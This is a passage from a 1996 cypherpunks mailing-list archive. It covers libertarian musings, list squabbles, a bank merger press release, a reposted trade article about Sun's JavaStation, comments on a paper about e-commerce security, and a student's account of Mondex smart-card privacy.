>Aye, there's the rub. So far I haven't *explicitly* drawn one. And the line I
>may draw now is probably different from the line I might have drawn 5
>years ago
>or 5 years from now. Ambiguity I can accept, its ambivalence, apathy and
>agnosticism that annoy me more.
>
>Tim's occasional combination of justifiable apathy tends to be the best
>combination to trigger a response.

"Justifiable apathy" is a good word for my beliefs. Yes, I am agnostic,
even atheistic, about most beliefs most people have.

For me, the skepticism of Nietzsche is far more comforting and believable.

The human animal concentrates its efforts and attentions on itself, its
family, its friends, and its various cohorts. Sometimes these cohorts are
local, sometimes on a mailing list like this one, sometimes international
groups.

My point? I feel more strongly about the death of one of my pets than I do
about hearing that some natural catastrophe in Bangla Desh has killed
100,000. And I think all honest persons will admit that this is a natural
reaction. The "Hamming distance" matters, and people I have never met on
the opposite side of the earth simply are _abstract numbers_ to me, as I am
to them. Natural.

Cryptography and networks allow the creation and maintenance of "virtual
communities" which alter Hamming distances, so that a list member in Bangla
Desh or Poland or Singapore may indeed become important to me. Social
spaces _are_ important--the death of a John Lennon is almost certainly felt
more strongly around the world than the deaths of 100,000 Bengalis as a
river overflows its banks.

Sorry for the digression from "coding" (:-}), but I thought I'd provide a
few more insights into my political views. Saying I display "occasional
combinations of justifiable apathy" is not the full picture.

And, as the other libertarians on the list will likely also say, it is not
that we libertarians and anarchists think the masses of the world are not
worth helping. It is more that we think the masses will best be helped by
lessening the burdens of the state--the recent worldwide (except China and
Cuba) collapse of Communism as a credible ideology moves us in this
direction.

The best thing *I* can do to help the various players I care about--myself,
my friends and family, my virtual communities, and some abstract aggregate
called "the future"--is to do what I'm doing now, by furthering an
ideology/system which is in tune with technological and political trends.


--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 28 Oct 1996 09:09:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hey! Dr. Vuilis!
In-Reply-To: <Pine.BSI.3.91.961027191913.7416C-100000@kizmiaz.dis.org>
Message-ID: <v03007801ae9aa9170c64@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:02 AM -0500 10/28/96, Dr.Dimitri Vulis KOTM wrote:

>It's ironic that I get such e-mail even though I'm not even subscribed to
>cypherpunks or coderpunks anymore. (I've been deleted from both lists several
>times w/o asking, apparently by the list owner; I resubscribed; so now
>majordomo@toad.com has been instructed to ignore all requests from me).
>
>I guess this illustrates again Tim May's and John Gilmore's love of
>free speech. :-)

Nonsense. I haven't unsubscribed you, nor do I know anyone who has. Nor do
I have any say over who is on the list and who is not. So far as I know,
majordomo@toad.com has not been "instructed" to ignore your list requests.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 28 Oct 1996 07:29:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Announcement
Message-ID: <v0300780cae9a816a89ee@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Comments: Authenticated sender is <trotterf@[172.16.1.10]>
From: "Frank O. Trotter, III" <ftrotter@marktwain.com>
Organization: Mark Twain Bank
To: Robert Hettinga <rah@shipwright.com>
Date: Mon, 28 Oct 1996 08:55:14 -5
Subject: Announcement
Reply-to: ftrotter@marktwain.com
Priority: normal


Bob:

Here is an official announcement that can be found at

http://www.marktwain.com/prs1096c.html

We feel that there is much positive to come from this on the
electronic commerce front and will be filling you in more later.

FOR IMMEDIATE RELEASE:

MERCANTILE BANCORPORATION INC. TO MERGE WITH MARK
TWAIN BANK

ST. LOUIS, October 28, 1996...Mercantile Bancorporation Inc. (NYSE:
MTL), an $18.2 billion asset bank holding company, and Mark Twain
Bancshares, Inc. (NYSE: MTB), a $3.1 billion asset bank holding
company, both headquartered in St. Louis, jointly announced today that
they have signed a definitive merger agreement. The transaction will
be a tax-free exchange valued at approximately $855 million.

"This merger of Mark Twain with Mercantile brings together the
strengths of two high-performing organizations and solidifies
Mercantile's position as the largest locally managed, and
independently owned banking operation in St. Louis and the state of
Missouri," said Thomas H. Jacobsen, chairman and chief executive
officer of Mercantile Bancorporation Inc.

"It is a compelling transaction that will harness the middle market
lending and other specialty businesses of Mark Twain with the power
and breadth of Mercantile's operation," Jacobsen added. "Both
institutions are generating strong revenue growth, increasing market
share and earnings momentum. We're convinced that the synergies
between our two institutions will create a highly competitive banking
organization with long-term benefits for our customers, employees and
shareholders."

"This is great news for St. Louis and Kansas City at a time of rapid
change in the financial services industry. We are very pleased to
partner with Mercantile Bancorporation and form a merged banking
entity in which everyone benefits," said John P. Dubinsky, president
and chief executive officer of Mark Twain Bancshares, Inc.

"Customers of Mark Twain will benefit from the extensive array of
consumer products and services developed by Mercantile. Both
organizations have outstanding CRA records and together will continue
to provide civic leadership in the region," Dubinsky said.

Mark Twain Directors unanimously approved the transaction and have
indicated that they will vote their shares in favor of the merger.
Under the terms of the agreement, Mark Twain shareholders will receive
.9520 shares of Mercantile common stock for each share of Mark Twain
common stock. The merger is structured as a tax-free exchange and will
be accounted for as a pooling of interests. Based on Friday's closing
price for Mercantile common stock of $52.125, the transaction is
valued at $49.62 per share of Mark Twain common stock.

In addition, both Mercantile and Mark Twain will rescind all
previously announced share repurchase programs. Mercantile may
repurchase up to 700,000 shares in the open market from time to time
depending upon market conditions and other factors.

Mark Twain Bancshares, Inc., one of the highest performing banks in
the country, has 39 banking locations in the St. Louis, Kansas City
and Belleville, IL areas. Mark Twain's related financial services
companies include: Mark Twain Capital Markets Group; Mark Twain
Brokerage Service, Inc.; Mark Twain Commercial Finance Division; Mark
Twain International Division and Mark Twain Trust.

The merger strengthens Mercantile's presence in the three largest
Missouri markets, increasing market share in the Kansas City
Metropolitan area from fourth to third; and moving Mercantile to a
stronger second in market share in the St. Louis area. Mark Twain's
pending acquisition in Springfield, Missouri will further increase
Mercantile's market share by approximately 20% in the Springfield
area.

Upon completion of the merger, Alvin J. Siteman, chairman of Mark
Twain Bancshares, Inc., will become Chairman of Mercantile Bank of St.
Louis, and will join the Mercantile Bancorporation Inc. Board of
Directors. In addition, John P. Dubinsky, will become president and
chief executive officer of Mercantile Bank of St. Louis and a member
of Mercantile's management executive committee, reporting to Thomas H.
Jacobsen. Peter F. Benoist, executive vice president, banking
division, Mark Twain Bancshares, Inc., will join Mercantile Bank of
St. Louis as a key member of the management team. Joseph E. Hasten,
the current president of Mercantile Bank of St. Louis, will assume the
position of chairman and chief institutional banking officer of
Mercantile's Corporate Bank serving the specialized financial needs of
Mercantile's commercial customers throughout the Midwest, reporting to
W. Randolph Adams, senior executive vice president of Mercantile
Bancorporation Inc.

Plans call for the merger, which is subject to the approval of
Mercantile and Mark Twain shareholders and all appropriate regulatory
agencies, to be completed in the second quarter of 1997.

Mercantile Bancorporation Inc., an $18.2 billion multi-bank holding
company headquartered in St. Louis, operates banks in Missouri, Iowa,
Kansas, Illinois and Arkansas. The company has mergers pending with
Today's Bancorp, Inc., First Financial Corporation of America, and
Regional Bancshares, Inc. Mercantile's non-banking subsidiaries
include companies providing brokerage services, asset-based lending,
investment advisory services, leasing services and credit life
insurance.

Contact:
Keith Miller (314) 889-0799 millerk@marktwain.com



Frank O. Trotter, III
Senior Vice President
Director International Markets Division
Mark Twain Bank
*****************************************
mailto:ftrotter@marktwain.com
http://www.marktwain.com
Fax: +1 314 569-4906

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel N. Weber II" <nemo@koa.iolani.honolulu.hi.us>
Date: Mon, 28 Oct 1996 12:35:03 -0800 (PST)
To: Jim Blandy <jimb@cyclic.com>
Subject: Re: appropriate
In-Reply-To: <199610281829.NAA23284@totoro.cyclic.com>
Message-ID: <Pine.SOL.3.91.961028103043.17852A-100000@koa.iolani.honolulu.hi.us>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 28 Oct 1996, Jim Blandy wrote:

> 
> >so what exactly is appropriate here?  Discussions of the appropriateness 
> >of discussing appropriateness?
> >
> >Or the appropriateness of discussing appropraiteness with messpellings or 
> >when you are aslleep???????
> 
> I'm sorry, this post is not appropriate for this mailing list.  Please
> send it elsewhere.  cypherpunks@toad.com, for example.

Could you please explain what _IS_ appropriate, then?

Why is this list not moderated to remove inapproriate posts?


nemo
                                                 http://www.nether.net/~jnw2
<nemo@koa.iolani.honolulu.hi.us>                    <devnull@gnu.ai.mit.edu>
----------------------------------------------------------------------------
"...For I have not come to call the righteous, but sinners."  -- Mathew 9:13





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Sun, 27 Oct 1996 22:48:19 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: considering internet/privacy periodical
Message-ID: <01BBC4BD.8872AB60@king1-05.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Greg Broiles

I see it not as a business but more like a way of organizing what I'm
thinking about already in a way that might be interesting to others.
...................................................................................


Once you create your web newsletter and see how many hits you get, you can better gauge the interest.   In any case, you will have your thoughts and references organized and can always use it in your communications to others on mailing lists or newsgroups, etc.

Since there's so much info on the net, one of the most valuable elements to introduce into it, besides search engines, is the organization of all that data in ways which make sense and speeds up the time involved in grasping the issues.

Plus, of course, if you give it a libertarian/anarchist slant, it would be an added "feature" for certain people.  Like Cpunks.

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Mon, 28 Oct 1996 07:00:34 -0800 (PST)
To: webmaster@mail1.flycontinental.com
Subject: COOL_TRAVELS: UNSUBSCRIBE US
Message-ID: <n1365621859.7489@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


This message was received by cypherpunks at toad.com.  This is a mailing list.
If you look at the To: line in its header, you will see "Cypherpunks Suck". 
If this isn't a clear sign of a forgery, I don't know what is.  Please remove
this account, cypherpunks@toad.com from your distribution.  Thank you for your
time and prompt response to this matter.

Thank you,
Patrick Mullen
and other members at
cypherpunks@toad.com
_______________________________________________________________________________
From: COOL_TRAVELS-request@plwils00.xweb.eds.com on Sat, Oct 26, 1996 5:47
Subject: You are now subscribed to the COOL_TRAVELS list
To: Cypherpunks Suck

Sat, 26 Oct 1996 02:03:21

Your subscription to  Continental Online (COOL) Travel  Specials has been
confirmed. Please  keep this E-mail  as it contains  important infomation
about the list you've joined.

There are two distinct e-mail addresses that you should be aware of.

1.  listserv  address:  LISTSERV@LISTSERV.XWEB.EDS.COM. 2.  mailing  list
address: COOL_TRAVELS@LISTSERV.XWEB.EDS.COM.


The first address:

LISTSERV@LISTSERV.XWEB.EDS.COM:

This  is  a  non-human,  administrative,  automatic-reply  address.  This
address works  similar to a telephone  voice response system. You  dial a
specific  number to  connect  to  the voice  response  system, enter  the
command/option to  complete a specific  task. There  is not an  option to
chat with  the voice response  system. Similarly, the address  above does
not recognize anything but pre-defined commands.

When you send E-mail to LISTSERV@LISTSERV.XWEB.EDS.COM, with a command in
the message body, LISTSERV@LISTSERV.XWEB.EDS.COM will reply to you with a
pre-defined response  to your command.  Commands are not  case sensitive,
and the "subject:" field does not matter.

Here are some useful commands.

subscribe cool_travels  firstname lastname  (To subscribe to  the mailing
list   cool_travels  or   overwrite  your   existing  account   with  new
information)

unsubscribe cool_travels (To unsubscribe the cool_travels list)

For security reasons, when you  unsubscribe/signoff the list will ask you
for a confirmation. When you  receive the confirmation, use your mailer's
"reply" feature and type OK, and nothing else, in the reply message. This
is meant to verify  that you really do want to be  removed from the list.
LISTSERV will  notify you  once the operation  is successful.  Please *DO
NOT* include the original confirmation message in your OK reply.

Again, send commands only to LISTSERV@LISTSERV.XWEB.EDS.COM.


The second important address is:

COOL_TRAVELS@LISTSERV.XWEB.EDS.COM:

This is  the mailing list  that will  bring you discounts  and promotions
from Continental Airlines. This is a one-way, announce-only mailing list.
It does  not accept mail postings  from the subscribers. Please  do *NOT*
reply to the messages sent to you from this mailing list. If you need any
assistance, please send an E-mail to:

WEBMASTER@MAIL1.FLYCONTINENTAL.COM

with COOL_TRAVELS  in the "subject:"  field. We  will be happy  to assist
you.


------------------ RFC822 Header Follows ------------------
Received: by mail.ndhm.gtegsc.com with SMTP;26 Oct 1996 05:47:08 -0400
Received: from toad.com by delphi.ndhm.gtegsc.com with SMTP;
          Sat, 26 Oct 1996 9:43:28 GMT
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id AAA19773 for
cypherpunks-outgoing; Sat, 26 Oct 1996 00:03:37 -0700 (PDT)
Received: from plwils00.xweb.eds.com (plwils00.xweb.eds.com [205.240.248.140])
by toad.com (8.7.5/8.7.3) with SMTP id AAA19763 for <cypherpunks@TOAD.COM>;
Sat, 26 Oct 1996 00:03:32 -0700 (PDT)
Received: from plwils00 by plwils00.xweb.eds.com via SMTP
(950911.SGI.8.6.12.PATCH825/940406.SGI)
	for <cypherpunks@TOAD.COM> id CAA15495; Sat, 26 Oct 1996 02:03:21 -0500
Message-Id: <199610260703.CAA15495@plwils00.xweb.eds.com>
Date:         Sat, 26 Oct 1996 02:03:21 -0500
From: "L-Soft list server at EDS (1.8b)"
              <LISTSERV@plwils00.xweb.eds.com>
Subject:      You are now subscribed to the COOL_TRAVELS list
To: Cypherpunks Suck <cypherpunks@toad.com>
Reply-To: COOL_TRAVELS-request@plwils00.xweb.eds.com
X-LSV-ListID: COOL_TRAVELS
Sender: owner-cypherpunks@toad.com
Precedence: bulk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lsurfer@cris.com (Randy Bradakis)
Date: Mon, 28 Oct 1996 12:50:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <m0vHpNG-000XEQa@maila.uscs.susx.ac.uk>
Message-ID: <AuNdyozvQwHB091yn@cris.com>
MIME-Version: 1.0
Content-Type: text/plain


"William H. Geiger III" <whgiii@amaranth.com> wrote:

[snip]

{Well as much as it pains me to take Dimitri's side I doubt that any damages 
{can be proved by his statements on this list. My reasoning for this opinion 
{is as follows:
{
{A.  Dimitri is a nut, kook, ...ect. Definitely suffering from dimished 
{capacity.
{
{B. Everyone on the list is aware of point A.

BZZZZT.  Point A well taken.  Point B fails, unfortunately.  Brought to 
my attention not so long ago by a post something along the lines of
"I'll take it for granted that Timmy May is a wanker, but what about
the crypto stuff on this list."  You can't disregard that there is a 
constant rotation of subscribers to this list.

{C. So with A & B true when Dimitri makes his nutty statements they are taken 
{by the list as just that, nutty statements. 

You're correct, so long as it's someone that's been on the list for 
long enough to realize that DV appears to have a problem distinguishing
real information from his fantasies.


By the by, I'd be happy to spend a few bucks to defray those legal
expenses, if it actually comes to that.  Either that, or I'll be 
happy to supply the rolled-up newspaper to whack him upon the nose.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jacobs@tfn.com (Karen Jacobs)
Date: Mon, 28 Oct 1996 08:30:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: copyright violations
Message-ID: <274DF7B0.3038@tfn.com>
MIME-Version: 1.0
Content-Type: text/plain


     FYI, American Banker and all sister publications are copyrighted 
     material.  As such, only very few select third parties have permission 
     to redistribute our material.  Please notify us immediately of any 
     third party contacting you with our material so that we may protect 
     our copyright.  Do not redistribute any information you receive from a 
     third party.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 28 Oct 1996 08:26:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: FDA_dis
Message-ID: <1.5.4.32.19961028162547.006a4b74@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


10-28-96. WaPo:

Dissing Declan's Hotwired slam of the FDA conference on 
regulating Internet advertising and promotion: "Ultimately, 
this debate isn't about speech. It comes down to how much 
regulation we want."

Declan, singe dis negro inquisto, si?

-----

http://jya.com/fdadis.txt

ftp://jya.com/pub/incoming/fdadis.txt

FDA_dis







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Copyright Violator <dildo@americanbanker.com>
Date: Tue, 29 Oct 1996 02:30:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: First Union Ahead of Curve with Sun's "JavaStation"
Message-ID: <327509C8.CAF@americanbanker.com>
MIME-Version: 1.0
Content-Type: text/plain


When Sun Microsystems unveils today what it is touting as a radical advance 
in business computing, First Union Corp. will be in the vanguard of those 
adopting it.

The announcement, at a media event in New York, will center on a hot trend 
that Sun reduces to three words: Java Enterprise Computing. Sun invited First 
Union, which has already deployed the technology in its capital markets 
operations, to share the spotlight with other Java innovators such as CSX, 
Federal Express, and British Telecom.

Rarely has a bank company been so much a part of high-tech hype, which makes
the First Union case and what it says about the potential impact of Java 
computing that much more noteworthy.

Based on a programming language -- Java -- that came out of Sun Microsystems
but is for practical purposes in the public domain, this new approach 
exemplifies what technologists call "network-centricity." It is widely seen 
as an antidote to the difficulty and expense of upgrading and maintaining 
vast numbers of personal computers in large organizations.

First Union bought into the idea long ago and views Java computing as "a 
natural evolution," said Peter Kelly, senior vice president of the company's 
lead bank in Charlotte, N.C. After about five months of development and use, 
he reported "a dramatic reduction in both time and cost for training, 
administration, and maintenance."

Participating in the announcement today, he said, First Union is less 
interested in glory or in endorsing Sun Microsystems -- the bank is drawn to 
Java because it is "vendor-neutral" -- than it is in "supporting a good 
business solution."

In the network-centric model, processing and programming power reside away
from the desktop on computers known as servers. Today's personal computers
can be reduced to, or replaced by, less expensive "thin clients." These rely 
on "fat servers" for what analyst Jean S. Bozman of International Data Corp. 
calls "the heavy lifting."

The computer press has recently given much attention to thin client 
opportunities in the home, such as an inexpensive appliance for Internet 
access that Oracle Corp., a leading advocate, dubbed the Network Computer, or 
NC.

Sun's initial appeal is decidedly to the corporate community, where it 
believes revolutions happen first. "This may be the beginning of an 
incredible 10-year change in the way we do computing," Sun Microsystems 
Computer Co. president Edward J. Zander said in an interview last week.

A thin client called JavaStation, along with an "easy administration" server, 
is to be included in Sun's announcement today. First Union is using the 
station to link a variety of desktop equipment with numerous data bases and 
files; Java breaks down the barriers between previously incompatible systems.

Mr. Kelly said the bank would likely explore the technology's applicability 
outside of capital markets.

Mr. Zander, who is based in Mountain View, Calif., said Java Enterprise
Computing is especially and immediately applicable to "what we call 
fixed-function applications." These include many back-office and 
customer-service activities in financial services that can be managed and 
administered centrally and delivered through specialized thin-client screens.

But what really attracts technologists' and business managers' attention is 
the economics. Sun projects 50% to 80% reductions in "the cost of ownership" 
of PCs, which can be tens or even hundreds of millions of dollars, depending 
on the size of a corporate network.

Hype it may be, but it is hard to find anybody to argue against it.

International Business Machines Corp., Microsoft Corp., Oracle Corp., and
Netscape Communications Corp. -- technology leaders often at odds with one
other and with Sun Microsystems -- have each jumped on this bandwagon in some
way. (In other NC-related developments Monday, Oracle and Netscape announced 
a strategic alliance, as did an opposing group that included Microsoft,
Intel Corp., and Hewlett-Packard Co.)

Sun's ebullient Mr. Zander will talk a blue streak about almost anything on 
the leading edge, as he did last week in declaring, "Java computing is ready 
for prime time." But he was also careful not to oversell.

Given the huge and entrenched population of PCs, he said, network computing 
is more evolutionary than revolutionary. Regarding Oracle chairman Lawrence
Ellison's vision of $500 NCs' replacing virtually all PCs, Mr. Zander saw a 
lack of realism because PC-based spreadsheet and graphics applications, among 
others, are likely to persist.

"We're not telling people to give up the power of the PC," Mr. Zander said, 
but to "put the complexity on the server, where it belongs . . . . It will 
take a couple of years, but it will happen."

Mr. Kelly, who is responsible for First Union's capital markets technology 
and support, described JavaStation as a logical extension of the bank's work 
with object-oriented computing -- the programming approach that relies on 
reusable objects, or building-blocks of code -- and C++, the standard 
programming language from which Java was derived.

Investment banking and capital markets gave Sun Microsystems its first major
inroads into financial services, which may explain why Mr. Kelly's department 
has been looking into Java opportunities for more than a year. The stations 
have recently replaced "fat client" terminals in trade reconciliation, 
settlement, and clearing.

"The redesign of an interface took only two to three weeks because we were
already on the server-centric model," Mr. Kelly said.

"This won't be the only client equipment we deploy . . . ," he added. 
"Interoperability is also our goal."

The pricing does have a revolutionary ring to it. Sun said it would begin 
shipping the entry-level JavaStation in December, with miniSparc chip and 
eight megabytes of main memory, for $740. With keyboard, mouse, and 14-inch 
color monitor, it will go for $995; with double the memory and a 17-inch 
monitor, $1,495.

A business PC installation rarely costs less than $3,000. And that is only 
part of what has come to irk corporate technology bosses. System maintenance, 
upgrades, and other expenses can amount to $12,000 per desktop per year. Java 
technology allows changes to be "written once and run anywhere" -- meaning 
"locally" on thin clients with powerful RISC (reduced instruction-set 
computing) processors embedded.

A large corporation with JavaStations, which don't need hard or floppy or
CD-ROM drives or moving parts because they depend on fat servers, "can save
millions of dollars and deliver the same or better functionality, even if 
this is implemented by just 10% of your work force," said Gene Banman, 
general manager of Sun's desktop systems group.

Sun executives expect JavaStation sales and related software applications to
flourish -- they already count 450 of the latter -- because of the cost 
factor and the Internet and intranet boom. Java is "a secure universal 
interface language" designed specifically for broad distribution over such 
open networks without regard to hardware and operating-system choices, said 
Jeffrey P. Morgenthal, research analyst at D.H. Brown Associates, Port 
Chester, N.Y.

Chief information officers can install Java "in phases without jeopardizing 
the existing infrastructure investment," he said. "I'm hard-pressed to 
believe that somebody is going to come up with an architecture in the near 
future to wipe this one out."

Ms. Bozman, the International Data analyst in Mountain View, said alternative
ways exist to shift the PC-support burden to central sites. But Java is 
gaining momentum. It burst on the Internet scene in the form of simple 
"applets" such as moving stock tickers but is evolving toward 
mission-critical corporate and packaged software.

"This is not just happening in the Sun world," she said. "Even Microsoft is 
selling Java toolkits."

Sun financial services vice president Rob Hall said he anticipates a rapid 
spread of Java computing because of the "dramatically lower total cost of 
ownership while providing flexible, platform-independent solutions.

"We are seeing strong interest in our thin-client JavaStation for 
process-heavy and repetitive tasks such as trade settlement back-office 
operations and customer service applications in retail banking call centers," 
Mr. Hall said.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 28 Oct 1996 10:46:21 -0800 (PST)
To: John Young <cypherpunks@toad.com
Subject: Re: FDA_dis
In-Reply-To: <1.5.4.32.19961028162547.006a4b74@pop.pipeline.com>
Message-ID: <v03007803ae9abfca6154@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:25 AM -0500 10/28/96, John Young wrote:

>Declan, singe dis negro inquisto, si?

I don't know about Declan, but I don't dis no negroes! Black is beautiful,
singed or not.

(Cypherpunks postings in Spanish or Latin? I guess if it helps the cause of
elitism, in further limiting the number of readers able to understand
postings, it's in a good cause. Sorry for not writing this in German, but
it's been too many years.)

--Tim

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kwit@iap.net.au
Date: Sun, 27 Oct 1996 20:08:34 -0800 (PST)
To: Leon W Samson <linefeed@juno.com>
Subject: Re: (no subject)
In-Reply-To: <3273CE73.32B3@geocities.com>
Message-ID: <3275122D.5106@iap.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Leon W Samson wrote:
> 
> hahahahahahahahaha learn to spam!!!!!hahahahahahahahah




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Hrabinsky" <Peter.James.Hrabinsky@eagle.wbm.ca>
Date: Mon, 28 Oct 1996 10:25:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: ? for HTML experts...
Message-ID: <199610281828.MAA10412@eagle.wbm.ca>
MIME-Version: 1.0
Content-Type: text/plain


Dear Sir/Madam:

I am wondering how I can include <p> tags in my HTML form wihtout it
screwing up the presentation of old browsers?

For example, when I get my mail-to form  mailed to my server, I want
it ready to be clipped into an HTML format.

For example:
 <p><strong>First Name:</strong> (or Nick Name)</p>
<blockquote> 
<p><input type=text size=25 maxlength=256 name="</p><p>Name/Nickname">

Ok, so if you look at my name="" area I include a </p> and <p> tag so
that it automatically formats the form that is submitted to me...

The problem is that IE 3.0 and the new Netscape browsers can handle
it, older browsers cannot.

So is there anyway to include tag text in a form without screwing
everything up?

Thank you for your help! I look foraward to your reply!

Peter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nicolas J. Hammond" <njhm@ns.njh.com>
Date: Mon, 28 Oct 1996 10:07:12 -0800 (PST)
To: pgut001@cs.auckland.ac.nz
Subject: Re: Secure Internet-based Electronic Commerce: The View from Outside the US
In-Reply-To: <84648715026895@cs26.cs.auckland.ac.nz>
Message-ID: <199610281736.MAA04140@ns.njh.com>
MIME-Version: 1.0
Content-Type: text/plain


pgut001@cs.auckland.ac.nz wrote ...
> I've just made a draft copy of this paper available for comment as 
> http://www.cs.auckland.ac.nz/~pgut01/paper.htm, a copy of the introduction is 
> given below.  The whole thing is around 170K long (40 A4 pages when printed).
> If anyone has any comments to make on it, please let me know.
>  
> Peter.

1) "...the number of security problems inherent in SMTP are legendary"

Incorrect. SMTP is safe. 
Some (most?) implementations of SMTP have not been safe.
There is a big distinction between the protocol and its implementation.

2) "C2...now being applied to networked single-user systems over
   multiple windows (which may require different security levels)"

I'm not aware of anyone doing that - doesn't mean it's not happening -
just seems an unusual configuration.

Other than these nits seems a v. thoroughly researched paper.

> Introduction
> ------------
>  
> [...]
>  
> Because of well-publicized break-ins there has been a steadily increasing 
> demand for encryption and related security measures to be included in software 
> products.  Unfortunately these measures often consist either of "voodoo 
> security" techniques where security is treated as a marketing checkbox only, 
> or are rendered ineffective by the US governments refusal to allow 
> non-americans access to the same security measures which it allows its own 
> citizens. Organisations employing such (in)security systems may make 
> themselves liable for damages or losses incurred when they are compromised.  
> This paper covers the issues of using weak, US government-approved security as 
> well as problems with flawed security measures, examines some of the measures 
> necessary to provide an adequate level of security, and then suggests several 
> possible solutions.

In general you equare security with cryptography - which is fine - 
but there are other tools that you need to use in addition to cryptography
to secure a system and network.

-- 
Nicolas Hammond                                 NJH Security Consulting, Inc.
njhm@njh.com                                    211 East Wesley Road
404 262 1633                                    Atlanta
404 812 1984 (Fax)                              GA 30305-3774




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: almika <bap@po.cwru.edu>
Date: Sun, 27 Oct 1996 21:45:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <3.0.32.19961028105706.00e08728@pop.cwru.edu>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "R.J.Blakemore" <cs94rjb@dcs.ex.ac.uk>
Date: Mon, 28 Oct 1996 05:34:35 -0800 (PST)
To: "David J. Phillips" <djphill@umich.edu>
Subject: Re: When did Mondex ever claim to be anonymous?
In-Reply-To: <199610251410.KAA17470@rodan.rs.itd.umich.edu>
Message-ID: <3274B5A7.2781@dcs.ex.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I'm a student at Exeter University in England.  If you are researching
Mondex, I am sure you are aware that we are currently undergoing a
world-wide Modex trial.

The National Westminster Bank have teamed up with the University to
provide every student with an "Intelligent Student Card" to replace our
old Student ID.

The new card has an electronic chip which can store a variety of
information on it.  We are not sure of exactly what it holds, but it can
store "cash" - placed onto it from specific points around campus, or any
Nat West Cash Point machine, or even using any phone box (Yep, the bank
have also teamed up with the phone company (BT) in order to get the
thing working).

The card can be used to pay for almost everything around campus.  Even
in the student pubs and bars.  The Uni are offering cheaper drinks for
those who pay by Mondex.  It is a wierd sight to watch people handing
over their student cards to pay for a pint!

I can give you as much information on the system as I can get hold of if
you want it.

As far as privacy is concerned, The claim that Modex is as private as
cash is plainly incorrect.  Both the card chip and the card reader store
details of the transaction.  The student can use a phone box, card
reader or Nat West Bank Cash Machine to get details of the last ten
transactions stored on the card.

As for the Bank, they get details on the item the student has purchased,
purchase location (the building and exact 'Mondex point' in the bar/shop
where the transaction took place), the exact time and date the
transaction was carried out, together with (obviously) the name and ID
of the purchaser, etc.

Should the police require the information for Criminal purposes, then (I
am almost certain) the Bank/University would be obliged by law to hand
